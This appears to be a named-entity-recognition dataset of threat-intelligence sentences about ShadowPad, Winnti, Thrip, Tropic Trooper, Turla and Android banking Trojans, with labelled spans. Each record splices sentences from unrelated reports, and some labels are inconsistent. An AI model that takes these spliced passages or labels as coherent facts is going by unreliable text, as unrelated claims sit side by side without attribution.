{"text": "However , many users are in no hurry to update the operating systems of their products . Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . To avoid suspicion , this service name , as well as the executable name , were chosen to look similar to the name of a Microsoft .NET optimiza S-IDTYtion Service . Nevertheless , previous analyses by CERT - UA and FortiGuard Labs indicate that final payloads , which included AgentTesla and Cobalt Strike , were used for information theft and remote access to infected systems .", "spans": [{"start": 425, "end": 467, "label": "System"}, {"start": 506, "end": 515, "label": "Organization"}, {"start": 520, "end": 535, "label": "Organization"}, {"start": 582, "end": 592, "label": "Malware"}, {"start": 597, "end": 610, "label": "Malware"}]}
{"text": "If a smartphone or tablet was released more than a year ago , it is probably no longer supported by the manufacturer and patching of vulnerabilities is no longer provided . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server . The numbering on each arrow corresponds to the chronological sequence of events . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n\u2019t happening any time soon .", "spans": [{"start": 235, "end": 244, "label": "System"}, {"start": 249, "end": 265, "label": "System"}, {"start": 397, "end": 402, "label": "Malware"}, {"start": 407, "end": 416, "label": "Malware"}]}
{"text": "In that case , the only help comes from an antivirus solution , for example , Kaspersky Internet Security for Android . But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . ShadowPad is a multimodular backdoor where the modules are referenced from the Root module with a circular list from which one can extract the module address , a UNIX timestamp ( probably embedded automatically during the module \u2019s compilation process ) and a module identifier . DLL sideloading attacks use the DLL search order mechanism in Windows to plant and then invoke a legitimate application that executes a malicious payload .", "spans": [{"start": 78, "end": 105, "label": "System"}, {"start": 110, "end": 117, "label": "System"}, {"start": 166, "end": 174, "label": "System"}, {"start": 249, "end": 271, "label": "Malware"}, {"start": 309, "end": 341, "label": "System"}, {"start": 346, "end": 355, "label": "System"}, {"start": 436, "end": 445, "label": "Malware"}, {"start": 464, "end": 472, "label": "Malware"}, {"start": 598, "end": 602, "label": "System"}]}
{"text": "Embedding malicious code in legitimate programs helps conceal infections from the victim . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes . From the module itself we can also extract the name the developer gave to the module . Sandworm utilized a novel technique to impact the OT environment by executing code within an End - of - Life ( EOL ) MicroSCADA control system and issuing commands that impacted the victim \u2019s connected substations .", "spans": [{"start": 330, "end": 338, "label": "Organization"}]}
{"text": "Of course , this does not mean the digital signature of the software developer can be used . TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks . This version embeds the 17 modules listed in the following table : An attacker could place HTML containing executable JavaScript inside element attributes .", "spans": [{"start": 93, "end": 96, "label": "Organization"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 343, "end": 430, "label": "Vulnerability"}]}
{"text": "However , due to the absence of certification centers verifying the digital signatures of Android programs , nothing prevents criminals from adding their own signature . January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia . 100 Root Thu 24 Oct 2019 12:08:27 PM UTC Initial shellcode . 101 Plugins Thu 24 Oct 2019 12:07:02 PM UTC Provides API for the other modules ; loads modules . 102 Config Thu 24 Oct 2019 12:07:09 PM UTC Handles encrypted configuration string pool . 103 Install Thu 24 Oct 2019 12:07:46 PM UTC Achieves persistence . 104 Online Thu 24 Oct 2019 12:07:17 PM UTC Overall communications with the C&C server . 106 ImpUser Thu 24 Oct 2019 12:07:24 PM UTC User impersonation via token duplication . 200 TCP Thu 24 Oct 2019 12:01:01 PM UTC TCP communications . 202 HTTPS Thu 24 Oct 2019 12:01:15 PM UTC HTTPS communications . 207 Pipe Thu 24 Oct 2019 12:01:35 PM UTC Handles named pipes . 300 Disk Thu 24 Oct 2019 12:02:29 PM UTC File system operations . 301 Process Thu 24 Oct 2019 12:02:36 PM UTC Process handling . 302 Servcie Thu 24 Oct 2019 12:02:45 PM UTC Service handling . 303 Register Thu 24 Oct 2019 12:02:52 PM UTC Registry operations . 304 Shell Thu 24 Oct 2019 12:03:00 PM UTC Command line operations . 306 Keylogger Thu 24 Oct 2019 12:03:16 PM UTC Keylogging to file system . 307 Screen Thu 24 Oct 2019 12:03:25 PM UTC Screenshot capture . 317 RecentFiles Thu 24 Oct 2019 12:04:44 PM UTC Lists recently accessed files . Since early 2022 , KillNet has claimed on multiple occasions to be partnering or coordinating with several criminal elements , including multiple occasions in which it claimed to be working with the widely known ransomware group REvil .", "spans": [{"start": 185, "end": 188, "label": "Organization"}, {"start": 219, "end": 236, "label": "Organization"}, {"start": 458, "end": 501, "label": "Indicator"}, {"start": 646, "end": 649, "label": "System"}, {"start": 750, "end": 753, "label": "Indicator"}, {"start": 786, "end": 789, "label": "Indicator"}, {"start": 849, "end": 854, "label": "Indicator"}, {"start": 1499, "end": 1506, "label": "Organization"}, {"start": 1709, "end": 1714, "label": "Organization"}]}
{"text": "As a result , a copy of Angry Birds installed from an unofficial app store or downloaded from a forum could easily contain malicious functionality . Thrip was using PsExec to move laterally between computers on the company 's network . These modules , except for RecentFiles , have already been mentioned by Kaspersky and Avast . The article highlighted the increasing popularity of targeted attacks .", "spans": [{"start": 24, "end": 35, "label": "System"}, {"start": 165, "end": 171, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 322, "end": 327, "label": "Organization"}]}
{"text": "Capabilities and functionality In 2013 , we detected several technological innovations developed and used by criminals in their malicious software . TAA triggered an alert at a large telecoms operator in Southeast Asia . Notice the \u201c Servcie \u201d typo . Based on these symbols , Mandiant assesses with moderate confidence that com.docker.vmnat was a version of the FULLHOUSE.DOORED backdoor .", "spans": [{"start": 149, "end": 152, "label": "Organization"}, {"start": 183, "end": 200, "label": "Organization"}, {"start": 324, "end": 340, "label": "Malware"}, {"start": 358, "end": 387, "label": "Malware"}]}
{"text": "Below are descriptions of some of the most interesting . AA triggered an alert at a large telecoms operator in Southeast Asia . As usual , all the module timestamps are spread over a short time range , which could suggest the use of a build framework to compile these modules . Currently , Mandiant has observed the deployment of Atera , AnyDesk , and SplashTop to establish and maintain a foothold following exploitation of CVE-2023 - 4966 .", "spans": [{"start": 90, "end": 107, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 330, "end": 335, "label": "System"}, {"start": 338, "end": 345, "label": "System"}, {"start": 352, "end": 361, "label": "System"}, {"start": 425, "end": 440, "label": "Vulnerability"}]}
{"text": "Control of malware from a single center provides maximum flexibility . PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . This also suggests that these modules were built a few hours before the launcher itself , whose compilation timestamp is Thu Oct 24 14:10:32 2019 . Hello . 3 am The time of mysticism , is nt it", "spans": [{"start": 71, "end": 77, "label": "System"}, {"start": 115, "end": 134, "label": "Malware"}, {"start": 421, "end": 466, "label": "Indicator"}]}
{"text": "Botnets can make considerably more money than autonomous Trojans . TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for . Since this compilation timestamp dates back two weeks before this campaign , it \u2019s likely that it has n\u2019t been tampered with by the attackers . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 67, "end": 70, "label": "Organization"}, {"start": 110, "end": 116, "label": "System"}]}
{"text": "It comes as no surprise then that many SMS-Trojans include bot functionality . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network . One might also note that the number of modules embedded in this variant is much higher ( 17 ) than the number of modules embedded in the variants previously documented in our white paper ( 8 to 10 modules ) . Ransomware attacks have shown no signs of slowing down in 2023 .", "spans": [{"start": 160, "end": 181, "label": "Malware"}, {"start": 437, "end": 455, "label": "Organization"}]}
{"text": "According to our estimates , about 60 % of mobile malware are elements of both large and small mobile botnets . three computers in China being used to launch the Thrip attacks . By default , every keystroke is recorded using the Keylogger module ( 306, previously documented by Avast ) and saved to disk in the file %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE . Mandiant Threat Intelligence assesses that UNC2452 activity aligns with nation - state priorities broadly and that the group \u2019s targeting patterns are consistent with Russian strategic interests .", "spans": [{"start": 278, "end": 283, "label": "Organization"}, {"start": 316, "end": 347, "label": "Indicator"}, {"start": 350, "end": 378, "label": "Organization"}, {"start": 393, "end": 400, "label": "Organization"}]}
{"text": "By using Google Cloud Messaging botnet owners can operate without a C & C server , thus eliminating the threat of the botnet being detected and blocked by law enforcement authorities . Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator . The log file is encrypted using the same algorithm as the one used to encrypt static strings from the module . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 9, "end": 31, "label": "System"}, {"start": 259, "end": 292, "label": "Organization"}, {"start": 406, "end": 416, "label": "System"}]}
{"text": "Google Cloud Messaging is designed to send short message ( up to 4 KB ) to mobile devices via Google services . Thrip seemed to be mainly interested in the operational side of the company . Using this module by default indicates that the attackers are interested in stealing information from the victims \u2019 machines . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": [{"start": 0, "end": 22, "label": "System"}, {"start": 94, "end": 100, "label": "Organization"}, {"start": 324, "end": 341, "label": "Organization"}, {"start": 377, "end": 385, "label": "Organization"}, {"start": 390, "end": 404, "label": "Organization"}]}
{"text": "The developer simply has to register and receive a unique ID for his applications . This suggests to us that Thrip 's motives go beyond spying and may also include disruption . In contrast , the variants we described in our white paper did n\u2019t even have that module embedded . Now , there are some key differences to note in the newest versions of Foudre", "spans": [{"start": 348, "end": 354, "label": "Organization"}]}
{"text": "The commands received via GCM can not be blocked immediately on an infected device . Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations . As with previous ShadowPad variants , the Config module ( 102 ) contains an encrypted string pool that can be accessed from any other module . If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": [{"start": 26, "end": 29, "label": "System"}, {"start": 367, "end": 376, "label": "Malware"}, {"start": 493, "end": 691, "label": "Vulnerability"}]}
{"text": "We have detected several malicious programs using GCM for command and control \u2013 the widespread Trojan-SMS.AndroidOS.FakeInst.a , Trojan-SMS.AndroidOS.Agent.ao , and Trojan-SMS.AndroidOS.OpFake.a among others . The group had also targeted three different telecoms operators , all based in Southeast Asia . The string pool is never stored entirely decrypted in memory ; the field of interest is decrypted when needed and then immediately freed ( thus quickly unavailable ) . Mandiant observed the threat actor use e.exe to load d.dll into lsass process memory .", "spans": [{"start": 50, "end": 53, "label": "System"}, {"start": 95, "end": 126, "label": "Malware"}, {"start": 129, "end": 158, "label": "Malware"}, {"start": 165, "end": 194, "label": "Malware"}, {"start": 254, "end": 272, "label": "Organization"}, {"start": 508, "end": 557, "label": "Indicator"}]}
{"text": "Google is actively combating this use of the service , responding quickly to reports from antivirus companies and blocking the IDs of cybercriminals . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks . The configuration size is 2180 bytes and the encrypted strings are located at offset 0x84 . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 244, "end": 262, "label": "Organization"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 426, "end": 439, "label": "Organization"}, {"start": 449, "end": 461, "label": "Organization"}]}
{"text": "Attacks on Windows XP allows mobile malware to infect a PC after connecting a smartphone or tablet . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . The algorithm used to decrypt the strings is the same as the one used to decrypt the static strings of the module . Who is the Winnti group ?", "spans": [{"start": 11, "end": 21, "label": "System"}, {"start": 101, "end": 110, "label": "Malware"}, {"start": 142, "end": 159, "label": "Malware"}, {"start": 376, "end": 388, "label": "Organization"}]}
{"text": "In early 2013 we detected two identical applications on Google Play that were allegedly designed for cleaning the operating system of Android-based devices from unnecessary processes . Many of the tools they use now feature new behaviors , including a change in the way they maintain a foothold in the targeted network . The campaign ID is located at offset 0x99 and is the name of the targeted university . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 56, "end": 67, "label": "System"}, {"start": 134, "end": 147, "label": "System"}, {"start": 408, "end": 418, "label": "System"}]}
{"text": "In fact , the applications are designed to download the autorun.inf file , an icon file and the win32-Trojan file , which the mobile malicious program locates in the root directory of an SD card . Execute a command through exploits for CVE-2017-11882 . Having a campaign ID related to the target is quite common in the case of ShadowPad and Winnti . The image will still display in viewers but the downloader will extract the executable content using the appropriate decryption key and the decryption algorithm .", "spans": [{"start": 56, "end": 72, "label": "Indicator"}, {"start": 96, "end": 108, "label": "System"}, {"start": 187, "end": 194, "label": "System"}, {"start": 236, "end": 250, "label": "Vulnerability"}, {"start": 327, "end": 336, "label": "Malware"}, {"start": 341, "end": 347, "label": "Malware"}, {"start": 394, "end": 510, "label": "Malware"}]}
{"text": "On connecting a smartphone in the USB drive emulation mode to a computer running Windows XP , the system automatically starts the Trojan ( if AutoPlay on the external media is not disabled ) and is infected . Execute a command through exploits for CVE-2018-0802 . Interestingly , the timestamp present in this config at offset 0x84 is later than the modules \u2019 timestamps and the loader compilation timestamp . It crafts configurable IEC-104 Application Service Data Unit ( ASDU ) messages , to change the state of RTU Information Object Addresses ( IOAs ) to ON or OFF .", "spans": [{"start": 34, "end": 43, "label": "System"}, {"start": 81, "end": 91, "label": "System"}, {"start": 248, "end": 261, "label": "Vulnerability"}]}
{"text": "The Trojan allows the criminals to remotely control the victim \u2019 s computer and is capable of recording sound from a microphone . The backdoor will load the encrypted configuration file and decrypt it , then use Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers . This suggests that this config is added manually to the sample after having been built . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": [{"start": 212, "end": 232, "label": "System"}, {"start": 235, "end": 238, "label": "System"}, {"start": 264, "end": 283, "label": "System"}, {"start": 608, "end": 621, "label": "System"}]}
{"text": "We would like to emphasize that this method of attack only works on Windows XP and Android versions prior to 2.2 . TClient is actually one of Tropic Trooper 's other backdoors . Even though it \u2019s probably coincidental , the date within the config corresponds to the date of the first detection of this sample at the corresponding university . CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 68, "end": 78, "label": "System"}, {"start": 83, "end": 90, "label": "System"}, {"start": 115, "end": 122, "label": "System"}, {"start": 343, "end": 375, "label": "Organization"}]}
{"text": "The most advanced mobile malicious programs today are Trojans targeting users \u2019 bank accounts \u2013 the most attractive source of criminal earnings . The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) . Once installed on the system , ShadowPad starts a hidden and suspended Microsoft Windows Media Player wmplayer.exe process and injects itself into that process . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": [{"start": 284, "end": 295, "label": "Malware"}, {"start": 307, "end": 318, "label": "Malware"}, {"start": 370, "end": 379, "label": "Malware"}, {"start": 410, "end": 440, "label": "System"}, {"start": 441, "end": 453, "label": "Indicator"}, {"start": 591, "end": 603, "label": "Malware"}]}
{"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others . The path to wmplayer.exe is provided by the Config module . Additionally , Mandiant has observed the use of the SoftPerfect network scanner ( netscan.exe ) to perform internal network enumeration .", "spans": [{"start": 92, "end": 99, "label": "System"}, {"start": 118, "end": 125, "label": "System"}, {"start": 230, "end": 242, "label": "Indicator"}, {"start": 330, "end": 373, "label": "System"}]}
{"text": "The cyber industry of mobile malware is becoming more focused on making profits more effectively , i.e. , mobile phishing , theft of credit card information , money transfers from bank cards to mobile phones and from phones to the criminalas \u2019 e-wallets . The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance . Once ShadowPad is injected into wmplayer.exe , the Online module will contact the C&C server using the URL specified in the configuration . A riskaverse actor , Iran generally seeks to avoid direct military confrontation against conventionally superior foes .", "spans": [{"start": 419, "end": 428, "label": "Malware"}, {"start": 446, "end": 458, "label": "Indicator"}, {"start": 496, "end": 499, "label": "System"}, {"start": 575, "end": 579, "label": "Organization"}]}
{"text": "Cybercriminals have become obsessed by this method of illegal earnings : at the beginning of the year we knew only 67 banking Trojans , but by the end of the year there were already 1321 unique samples . Taiwan has been a regular target of cyber espionage threat actors for a number of years . The communication is then handled by the TCP module ( 200 ) , which was previously documented by Kaspersky . In June 2023 , Anonymous Sudan claimed an operation targeting Microsoft services .", "spans": [{"start": 335, "end": 338, "label": "Indicator"}, {"start": 391, "end": 400, "label": "Organization"}, {"start": 418, "end": 433, "label": "Organization"}, {"start": 465, "end": 483, "label": "System"}]}
{"text": "Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . In early August , Unit 42 identified two attacks using similar techniques . In addition to ShadowPad , the Winnti malware was found on some machines at these two universities at the end of October ( i.e . two weeks before ShadowPad ) in the file C:\\Windows\\System32\\oci.dll and is detected by ESET products as Win64/Winnti.CA . Organizations evaluating their security posture and developing a risk based security framework would be well served to consider the various potential motivational related threats .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 169, "end": 178, "label": "Malware"}, {"start": 185, "end": 191, "label": "Malware"}, {"start": 300, "end": 309, "label": "Malware"}, {"start": 324, "end": 351, "label": "Indicator"}, {"start": 371, "end": 375, "label": "Organization"}, {"start": 406, "end": 419, "label": "Organization"}]}
{"text": "mobile_treats_2013_04s The number of mobile banking Trojans in our collection Mobile banking Trojans can run together with Win-32 Trojans to bypass the two-factor authentication \u2013 mTAN theft ( the theft of banking verification codes that banks send their customers in SMS messages ) . which has been active since at least 2011 . The Winnti malware usually contains a configuration specifying a campaign ID and a C&C URL . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": [{"start": 123, "end": 129, "label": "System"}, {"start": 333, "end": 339, "label": "Malware"}, {"start": 412, "end": 415, "label": "System"}]}
{"text": "However , in 2013 , autonomous mobile banking Trojans developed further . One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT . On all machines the campaign ID matches the name of the targeted university and the C&C URLs are : If you are talking to someone who may be a target of commercial spyware ( i.e. , human rights journalists , activists , dissidents and lawyers )", "spans": [{"start": 122, "end": 137, "label": "System"}, {"start": 292, "end": 295, "label": "System"}, {"start": 388, "end": 412, "label": "Organization"}, {"start": 415, "end": 424, "label": "Organization"}, {"start": 427, "end": 437, "label": "Organization"}, {"start": 442, "end": 449, "label": "Organization"}]}
{"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . w[redacted].livehost.live : 443 . w[redacted].dnslookup.services : 443 . where the redacted part corresponds to the name of the targeted university . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 253, "end": 263, "label": "System"}, {"start": 328, "end": 339, "label": "Organization"}, {"start": 375, "end": 400, "label": "Indicator"}, {"start": 409, "end": 439, "label": "Indicator"}, {"start": 565, "end": 612, "label": "Vulnerability"}]}
{"text": "mobile_treats_2013_05s Infections caused by mobile banking programs Today , the majority of banking Trojan attacks affect users in Russia and the CIS . The document attached to this e-mail exploits CVE-2012-0158 . One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld : 443 where [backdoor_type] is a single letter which is either \u201c w \u201d in the case of the Winnti malware or \u201c b \u201d in the case of ShadowPad . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": [{"start": 182, "end": 197, "label": "Vulnerability"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 239, "end": 242, "label": "System"}, {"start": 260, "end": 266, "label": "Malware"}, {"start": 271, "end": 280, "label": "Malware"}, {"start": 432, "end": 438, "label": "Malware"}, {"start": 471, "end": 480, "label": "Malware"}, {"start": 671, "end": 679, "label": "Organization"}]}
{"text": "However , this situation will not last long : given the cybercriminals \u2019 interest in user bank accounts , the activity of mobile banking Trojans is expected to grow in other countries in 2014 . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . From this format , we were able to find several C&C URLs , including three additional Hong Kong universities \u2019 names . A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": [{"start": 260, "end": 271, "label": "Malware"}, {"start": 397, "end": 400, "label": "Indicator"}, {"start": 521, "end": 539, "label": "Vulnerability"}, {"start": 543, "end": 559, "label": "Vulnerability"}]}
{"text": "As mentioned above , banking Trojans are perhaps the most complex of all mobile threats , and Svpeng is one of the most striking examples . Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group . The campaign identifiers found in the samples we \u2019ve analyzed match the subdomain part of the C&C server , showing that these samples were really targeted against these universities . SocialPolitical Hacktivism primarily intrinsic Social or Ideological issues create a motivation for some to attack organizations to make a statement .", "spans": [{"start": 94, "end": 100, "label": "Malware"}, {"start": 229, "end": 251, "label": "System"}, {"start": 398, "end": 401, "label": "System"}, {"start": 603, "end": 616, "label": "Organization"}]}
{"text": "Svpeng In mid-July , we detected Trojan-SMS.AndroidOS.Svpeng.a which , unlike its SMS Trojan counterparts , is focused on stealing money from the victiim \u2019 s bank account rather than from his mobile phone . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan . The Winnti Group is still actively using one of its flagship backdoors , ShadowPad , this time against Hong Kong universities . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 33, "end": 62, "label": "Malware"}, {"start": 282, "end": 296, "label": "Organization"}, {"start": 314, "end": 337, "label": "Organization"}, {"start": 351, "end": 366, "label": "Organization"}, {"start": 383, "end": 395, "label": "Organization"}, {"start": 440, "end": 449, "label": "Malware"}, {"start": 452, "end": 461, "label": "Malware"}, {"start": 545, "end": 565, "label": "Organization"}, {"start": 594, "end": 620, "label": "Organization"}, {"start": 671, "end": 689, "label": "System"}]}
{"text": "It can not act independently and operates strictly in accordance with commands received from the C & C server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . In this campaign , the VMProtected launcher used with ShadowPad , as well as with the PortReuse backdoor and skip-2.0 , was replaced by a simpler one . These types of approaches are not uncommon historically , groups have done things like provide \" security reports \" to compromised organizations to help them \" resolve the issue . \"", "spans": [{"start": 112, "end": 126, "label": "Organization"}, {"start": 152, "end": 165, "label": "Vulnerability"}, {"start": 219, "end": 230, "label": "System"}, {"start": 250, "end": 259, "label": "Malware"}, {"start": 282, "end": 300, "label": "Malware"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 467, "end": 527, "label": "Malware"}]}
{"text": "This malicious program spreads via SMS spam and from compromised legitimate sites that redirect mobile users to a malicious resource . The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years . That these samples , in addition to having been found at these universities , contain campaign IDs matching the universities \u2019 names and use C&C URLs containing the universities \u2019 names are good indications that this campaign is highly targeted . 8.8 Management of technical vulnerabilities \u2013 prioritizing the mitigation and patching of vulnerabilities based on their potential and current risk of abuse requires identifying the assessed severity of a vulnerability and how this may change .", "spans": [{"start": 139, "end": 172, "label": "Organization"}, {"start": 198, "end": 209, "label": "Organization"}, {"start": 421, "end": 424, "label": "System"}]}
{"text": "There the user is prompted to download and install a Trojan imitating an Adobe Flash Player update . Turla is a notorious group that has been targeting governments . We will continue to monitor new activities of the Winnti Group and will publish relevant information on our blog . Revenge intrinsic Disgruntled employees or former employees are those that typically commit the lions share of revengebased cyberattacks .", "spans": [{"start": 73, "end": 91, "label": "System"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 216, "end": 228, "label": "Organization"}]}
{"text": "Svpeng is capable of doing lots of things . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets . For any inquiries , contact us at threatintel@eset.com . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 44, "end": 49, "label": "Organization"}]}
{"text": "It collects information about the smartphone ( IMEI , country , service provider , operating system language ) and sends it to the host via the HTTP POST request . Turla is a notorious group that has been targeting government officials . The IoCs are also available in our GitHub repository . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": [{"start": 164, "end": 169, "label": "Organization"}, {"start": 215, "end": 235, "label": "Organization"}, {"start": 273, "end": 279, "label": "System"}, {"start": 339, "end": 346, "label": "Organization"}, {"start": 370, "end": 391, "label": "Organization"}, {"start": 406, "end": 419, "label": "System"}, {"start": 463, "end": 483, "label": "Organization"}]}
{"text": "This appears to be necessary to determine the number of banks the victim may use . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . ESET detection names : Win32 / Shadowpad.C trojan Win64 / Winnti.CA trojan . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": [{"start": 87, "end": 96, "label": "Malware"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 249, "end": 279, "label": "Vulnerability"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 347, "end": 352, "label": "System"}, {"start": 355, "end": 366, "label": "Indicator"}, {"start": 367, "end": 373, "label": "Malware"}, {"start": 374, "end": 379, "label": "System"}, {"start": 382, "end": 391, "label": "Indicator"}, {"start": 392, "end": 398, "label": "Malware"}, {"start": 406, "end": 429, "label": "Organization"}, {"start": 483, "end": 491, "label": "Malware"}, {"start": 508, "end": 516, "label": "Malware"}, {"start": 519, "end": 526, "label": "Malware"}, {"start": 531, "end": 545, "label": "Malware"}, {"start": 633, "end": 638, "label": "Organization"}, {"start": 793, "end": 807, "label": "Organization"}, {"start": 810, "end": 829, "label": "Organization"}, {"start": 838, "end": 867, "label": "Organization"}]}
{"text": "Svpeng is only currently attacking clients of Russian banks . Turla is a notorious group that has been targeting diplomats . Winnti : hpqhvsei.dll . The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 62, "end": 67, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 125, "end": 131, "label": "Organization"}, {"start": 134, "end": 146, "label": "Indicator"}, {"start": 172, "end": 180, "label": "Organization"}, {"start": 221, "end": 235, "label": "Organization"}, {"start": 274, "end": 282, "label": "Organization"}]}
{"text": "Typically , however , cybercriminals first test-run a technology on the Russian sector of the Internet and then roll it out globally , attacking users in other countries . The codename for Turla APT group in this presentation is MAKERSMARK . Winnti : CLR.exe . We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": [{"start": 189, "end": 204, "label": "Organization"}, {"start": 242, "end": 248, "label": "Organization"}, {"start": 251, "end": 258, "label": "Indicator"}, {"start": 330, "end": 341, "label": "Organization"}, {"start": 371, "end": 389, "label": "Organization"}, {"start": 394, "end": 424, "label": "Organization"}]}
{"text": "It steals SMS messages and information about voice calls . The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced . Winnti : hpqhvsei.dll . Identifying suspicious virtual desktop agent Windows Registry keys", "spans": [{"start": 123, "end": 169, "label": "Organization"}, {"start": 172, "end": 175, "label": "Organization"}, {"start": 211, "end": 226, "label": "Organization"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 312, "end": 324, "label": "Indicator"}]}
